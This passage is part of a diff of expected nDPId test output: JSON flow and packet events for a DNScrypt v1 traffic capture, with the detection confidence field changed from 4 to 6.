-00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":508,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":38242,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":508,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":38242,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":509,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":33246,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":509,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":1,"flow_last_seen":946739396070,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739396070,"pkt":"REREREREZmZmZmZmCABFAAXcSFogAH4RFuAKAAABLuPIN4HeIPsGBEfaFc4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydARyZG5zBmZhZWxpeANuZXQAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":33246,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":33246,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":510,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739396070} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":510,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739396070,"pkt":"REREREREZmZmZmZmCABFAABQSFkAuX4RO7QKAAABLuPINwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":511,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739396070} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":511,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739396070,"pkt":"REREREREZmZmZmZmCABFAABQSFoAuX4RO7MKAAABLuPINwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":512,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":50277,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":512,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":1,"flow_last_seen":946739396070,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739396070,"pkt":"REREREREZmZmZmZmCABFAAIcSFtAAH4R+p4KAAABLuPIN8RlIPsCCLnwFdEBAAABAAAAAAABATINZG5zY3J5cHQtY2VydARyZG5zBmZhZWxpeANuZXQAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":50277,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":50277,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":513,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":44161,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":513,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":1,"flow_last_seen":946739396070,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739396070,"pkt":"REREREREZmZmZmZmCABFAAXcSFwgAH4RFt4KAAABLuPIN6yBIPsGBB0zFdIBAAABAAAAAAABATINZG5zY3J5cHQtY2VydARyZG5zBmZhZWxpeANuZXQAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":513,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":44161,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":513,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":44161,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":514,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739396070} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":514,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739396070,"pkt":"REREREREZmZmZmZmCABFAABQSFwAuX4RO7EKAAABLuPINwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":515,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":49177,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":1,"flow_last_seen":946739396070,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739396070,"pkt":"REREREREZmZmZmZmCABFAAIcSF1AAH4R+pwKAAABLuPIN8AZIPsCCLnwFc8BAAABAAAAAAABATINZG5zY3J5cHQtY2VydARyZG5zBmZhZWxpeANuZXQAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":515,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":49177,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":515,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":49177,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":516,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":2,"flow_last_seen":946739396071,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":946739396071,"pkt":"ZmZmZmZmRERERERECABFAADTkQhAADcR9haQW2rjCgAAAQG71CEAvwNXZlqBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdANvbmUAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAALkTa3PmYOnbKVsenPA+dUbqb7bPdeethm+r51VaewMcP0sfe1RtTAHcc8Uvs8bFQylZgA4Na3Yk4xgl2KWmKw4bPctGhBgarq2J2ya3ifLfvYsxbqqez8iaBEin48TCXxs9y0aEGBquAAAAAV9TgfdfVNN3"} 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":517,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":2,"flow_last_seen":946739396071,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":946739396071,"pkt":"ZmZmZmZmRERERERECABFAADTkQVAADcR9hmQW2rjCgAAAQG7vKwAvxrIZl6BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdANvbmUAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAALkTa3PmYOnbKVsenPA+dUbqb7bPdeethm+r51VaewMcP0sfe1RtTAHcc8Uvs8bFQylZgA4Na3Yk4xgl2KWmKw4bPctGhBgarq2J2ya3ifLfvYsxbqqez8iaBEin48TCXxs9y0aEGBquAAAAAV9TgfdfVNN3"} 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":201,"flow_packet_id":2,"flow_last_seen":946739396073,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":946739396073,"pkt":"ZmZmZmZmRERERERECABFAADTkQdAADcR9heQW2rjCgAAAQG7vG0AvxsMZlmBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdANvbmUAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAALkTa3PmYOnbKVsenPA+dUbqb7bPdeethm+r51VaewMcP0sfe1RtTAHcc8Uvs8bFQylZgA4Na3Yk4xgl2KWmKw4bPctGhBgarq2J2ya3ifLfvYsxbqqez8iaBEin48TCXxs9y0aEGBquAAAAAV9TgfdfVNN3"} @@ -1056,24 +1056,24 @@ 00711{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":525,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":2,"flow_last_seen":946739396110,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739396110,"pkt":"ZmZmZmZmRERERERECABFAADWzC9AADcRvxAu48g3CgAAASD7rIEAwu03FdKAAAABAAEAAAAAATINZG5zY3J5cHQtY2VydARyZG5zBmZhZWxpeANuZXQAABAAAcAMABAAAQAADhAAfXxETlNDAAEAADn5TxO0FAodB0MfyNII\/q4yfvBzna8lha8rHqMZH6brB0hzmteXf96oRMNtUVCp592lxf62HHwuDSbhBbtGtQcalorpuHO8PTt\/PSXI1nToKeQ\/\/4xUAF+WFp6Iz9p9KhqWium4c7w9AAAAAV7URQBxousA"} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":526,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":54375,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 